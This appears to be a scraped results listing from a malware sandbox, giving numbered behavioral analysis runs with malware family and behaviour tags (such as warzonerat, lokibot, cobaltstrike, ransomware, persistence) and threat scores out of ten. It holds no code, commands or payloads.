behavioral16

Score
1/10

behavioral17

aspackv2evasionpersistencetrojanupx
Score
10/10

behavioral18

aspackv2evasionpersistencetrojanupx
Score
10/10

behavioral19

Score
5/10

behavioral20

Score
5/10

behavioral21

warzoneratinfostealerpersistencerat
Score
10/10

behavioral22

warzoneratinfostealerpersistencerat
Score
10/10

behavioral23

Score
1/10

behavioral24

Score
1/10

behavioral25

discovery
Score
8/10

behavioral26

discovery
Score
8/10

behavioral27

betabotbackdoorbotnetevasiontrojan
Score
10/10

behavioral28

betabotbackdoorbotnetevasiontrojan
Score
10/10

behavioral29

lokibotspywarestealertrojan
Score
10/10

behavioral30

lokibotspywarestealertrojan
Score
10/10

behavioral31

Score
3/10

behavioral32

Score
3/10

behavioral33

tofseexmrigevasionminerpersistencetrojan
Score
10/10

behavioral34

tofseexmrigevasionminerpersistencetrojan
Score
10/10

behavioral35

upx
Score
9/10

behavioral36

upx
Score
9/10

behavioral37

persistence
Score
6/10

behavioral38

persistence
Score
6/10

behavioral39

cobaltstrikebackdoortrojan
Score
10/10

behavioral40

cobaltstrikebackdoortrojan
Score
10/10

behavioral41

imminentspywaretrojan
Score
10/10

behavioral42

imminentspywaretrojan
Score
10/10

behavioral43

Score
4/10

behavioral44

Score
4/10

behavioral45

matrixdiscoverypersistenceransomware
Score
10/10

behavioral46

matrixdiscoverypersistenceransomware
Score
10/10

behavioral47

hawkeyekeyloggerpersistencespywarestealertrojan
Score
10/10

behavioral48

hawkeyekeyloggerpersistencespywarestealertrojan
Score
10/10

behavioral49

evasionpersistencetrojan
Score
10/10

behavioral50

evasionpersistencetrojan
Score
10/10

behavioral51

Score
1/10

behavioral52

Score
1/10

behavioral53

agentteslakeyloggerpersistencespywarestealertrojan
Score
10/10

behavioral54

agentteslakeyloggerpersistencespywarestealertrojan
Score
10/10

behavioral55

adwarediscoverypersistencestealer
Score
7/10

behavioral56

adwarediscoverypersistencestealer
Score
7/10

behavioral57

persistence
Score
8/10

behavioral58

persistence
Score
8/10

behavioral59

spywareupx
Score
8/10

behavioral60

spyware
Score
7/10

behavioral61

lokibotpersistencespywarestealertrojan
Score
10/10

behavioral62

lokibotpersistencespywarestealertrojan
Score
10/10

behavioral63

Score
8/10

behavioral64

Score
8/10

behavioral65

Score
1/10

behavioral66

Score
1/10

behavioral67

evasion
Score
9/10

behavioral68

evasion
Score
9/10

behavioral69

Score
8/10

behavioral70

Score
8/10

behavioral71

Score
7/10

behavioral72

Score
7/10

behavioral73

Score
1/10

behavioral74

njratevasionpersistencetrojan
Score
10/10

behavioral75

Score
1/10

behavioral76

Score
1/10

behavioral77

Score
1/10

behavioral78

Score
1/10

behavioral79

bootkitpersistence
Score
8/10

behavioral80

bootkitpersistence
Score
8/10

behavioral81

Score
7/10

behavioral82

Score
7/10

behavioral83

persistence
Score
8/10

behavioral84

persistence
Score
8/10

behavioral85

evasionransomware
Score
9/10

behavioral86

evasionransomware
Score
9/10

behavioral87

qakbot1535648626bankerpersistencestealertrojan
Score
10/10

behavioral88

qakbot1535648626bankerpersistencestealertrojan
Score
10/10

behavioral89

Score
8/10

behavioral90

imminentpersistencespywaretrojan
Score
10/10

behavioral91

Score
8/10

behavioral92

Score
8/10

behavioral93

limeratrat
Score
10/10

behavioral94

limeratrat
Score
10/10

behavioral95

Score
7/10

behavioral96

Score
7/10

behavioral97

Score
7/10

behavioral98

Score
7/10

behavioral99

evasionpersistencetrojanupx
Score
10/10

behavioral100

evasionpersistencetrojanupx
Score
10/10

behavioral101

Score
1/10

behavioral102

Score
1/10

behavioral103

Score
8/10

behavioral104

Score
8/10

behavioral105

upx
Score
8/10

behavioral106

upx
Score
8/10

behavioral107

Score
1/10

behavioral108

Score
1/10

behavioral109

Score
1/10

behavioral110

Score
1/10

behavioral111

gozi_ifsbbankertrojan
Score
10/10

behavioral112

gozi_ifsbbankertrojan
Score
10/10

behavioral113

discovery
Score
8/10

behavioral114

discovery
Score
8/10

behavioral115

discovery
Score
6/10

behavioral116

discovery
Score
6/10

behavioral117

upx
Score
8/10

behavioral118

Score
1/10

behavioral119

Score
8/10

behavioral120

Score
3/10

behavioral121

evasionpersistence
Score
9/10

behavioral122

evasionpersistence
Score
9/10

behavioral123

xmrigminer
Score
10/10

behavioral124

xmrigminer
Score
10/10

behavioral125

azorultinfostealerpersistencetrojan
Score
10/10

behavioral126

azorultinfostealerpersistencetrojan
Score
10/10

behavioral127

evasionpersistencetrojan
Score
8/10

behavioral128

evasionpersistencetrojan
Score
8/10

behavioral129

Score
1/10

behavioral130

Score
1/10

behavioral131

persistenceransomwarespyware
Score
8/10

behavioral132

ransomwarespyware
Score
8/10

behavioral133

evasiontrojan
Score
6/10

behavioral134

evasiontrojan
Score
6/10

behavioral135

Score
1/10

behavioral136

Score
1/10

behavioral137

Score
7/10

behavioral138

Score
7/10

behavioral139

Score
7/10

behavioral140

Score
7/10

behavioral141

gozi_ifsbbankerbootkitevasionpersistencetrojan
Score
10/10

behavioral142

gozi_ifsbbankerbootkitevasionpersistencetrojan
Score
10/10

behavioral143

warzoneratinfostealerpersistencerat
Score
10/10

behavioral144

warzoneratinfostealerpersistencerat
Score
10/10

behavioral145

Score
1/10

behavioral146

Score
1/10

behavioral147

ransomwarespyware
Score
9/10

behavioral148

ransomwarespyware
Score
9/10

behavioral149

xmrigdiscoveryevasionminerpersistenceupx
Score
10/10

behavioral150

xmrigdiscoveryevasionminerpersistenceupx
Score
10/10

behavioral151

Score
1/10

behavioral152

Score
1/10

behavioral153

Score
3/10

behavioral154

Score
3/10

behavioral155

upx
Score
8/10

behavioral156

upx
Score
8/10

behavioral157

Score
6/10

behavioral158

Score
6/10

behavioral159

persistencespyware
Score
8/10

behavioral160

persistencespyware
Score
8/10

behavioral161

gluptebadropperevasionloaderpersistencetrojanupx
Score
10/10

behavioral162

gluptebadropperevasionloaderpersistencetrojanupx
Score
10/10

behavioral163

hawkeye_rebornm00nd3v_loggerkeyloggerspywarestealertrojan
Score
10/10

behavioral164

hawkeye_rebornm00nd3v_loggerkeyloggerspywarestealertrojan
Score
10/10

behavioral165

Score
9/10

behavioral166

Score
9/10

behavioral167

remcospersistencerat
Score
10/10

behavioral168

persistence
Score
6/10

behavioral169

Score
7/10

behavioral170

Score
7/10

behavioral171

upx
Score
8/10

behavioral172

upx
Score
8/10

behavioral173

Score
8/10

behavioral174

Score
8/10

behavioral175

spyware
Score
7/10

behavioral176

spyware
Score
7/10

behavioral177

Score
8/10

behavioral178

Score
8/10

behavioral179

Score
3/10

behavioral180

Score
3/10

behavioral181

Score
1/10

behavioral182

Score
1/10

behavioral183

Score
1/10

behavioral184

Score
1/10

behavioral185

Score
1/10

behavioral186

Score
1/10

behavioral187

Score
1/10

behavioral188

Score
1/10

behavioral189

Score
1/10

behavioral190

Score
1/10

behavioral191

discoveryspyware
Score
8/10

behavioral192

spyware
Score
8/10

behavioral193

azorultinfostealertrojan
Score
10/10

behavioral194

azorultinfostealertrojan
Score
10/10

behavioral195

Score
7/10

behavioral196

Score
7/10

behavioral197

upx
Score
8/10

behavioral198

upx
Score
8/10

behavioral199

Score
1/10

behavioral200

Score
1/10

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.